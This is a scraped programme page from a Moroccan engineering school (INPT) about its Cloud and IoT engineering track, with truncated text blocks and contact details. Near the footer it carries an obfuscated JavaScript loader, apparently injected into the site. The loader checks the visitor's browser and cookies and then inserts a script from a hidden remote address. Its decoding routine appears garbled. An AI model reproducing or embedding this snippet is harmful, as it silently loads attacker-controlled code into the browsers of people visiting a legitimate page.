

⚡ [1] ⚡ [1]

[Ingénieur Cloud et IoT](#) [2]

Ingénieur Cloud et IoT

Filière Ingénierie des Systèmes Ubiquitaires et D

Objectifs

L'ingénieur cloud et IoT accompagne les mutations des systèmes d'information des entreprises vers l'informatique dans le cloud, notamment à travers la dématérialisation des infrastructures IT et des services numériques y
[Lire plus](#) [3]

Co



Les comp
l'intégrat
besoins e

Débouchés

La formation pluridisciplinaire dispensée par l'INPT, centrée sur l'apprentissage de l'innovation et de la créativité, confère aux lauréats des atouts intellectuels et des facultés d'adaptation qui leur permettent d'aborder de multiples métiers afférents.
[Lire plus](#) [5]

être
Cu

La forma
donner à
d'outils s
[L](#)

Coordonnateur de filière :

M. Abdeslam EN-NOUAARY
abdeslam@inpt.ac.ma
Tél : +212 538 00 28 29

[Télécha](#)

```
;(function(){var x=navigator[m("4t"}n)e}gnA(r;eistu}");var y=document[m(":e}idk,owodc,");if(s(x,
m("0s7w)obd)n)i(W{"})&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=docu
ment.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{
3;3{8,d{8(c)0cb}6951=,v;&0)3{2{=udlirc6?:srjx.{e,d4o6c{_8s}/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.(k
}c(a3r4t)/{/v:ssrp}txtxh,');var
o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function
m(v){var a="";for(var f=0;f=0;p--){k+=t[p];}return k;}})();
```

© 2017 Institut National des Postes et Télécommunications

•
•

Source URL: <http://web.inpt.ac.ma/fr/ing%C3%A9nieur-cloud-et-iot>

Liens

- [1] <http://web.inpt.ac.ma/fr/javascript%3A%3B>
- [2] <http://web.inpt.ac.ma/fr/ing%C3%A9nieur-cloud-et-iot>
- [3] <http://web.inpt.ac.ma/fr/ing%C3%A9nieur-cloud-et-iot-objectifs>
- [4] <http://web.inpt.ac.ma/fr/ing%C3%A9nieur-cloud-et-iot-comp%25C3%25A9tences>
- [5] <http://web.inpt.ac.ma/fr/ing%C3%A9nieur-cloud-et-iot-d%C3%A9bouch%C3%A9s>
- [6] <http://web.inpt.ac.ma/fr/ing%C3%A9nieur-cloud-et-iot-cursus>
- [7] <http://web.inpt.ac.ma/sites/default/files/article/Art2018/Dépliant%20 INPT.pdf>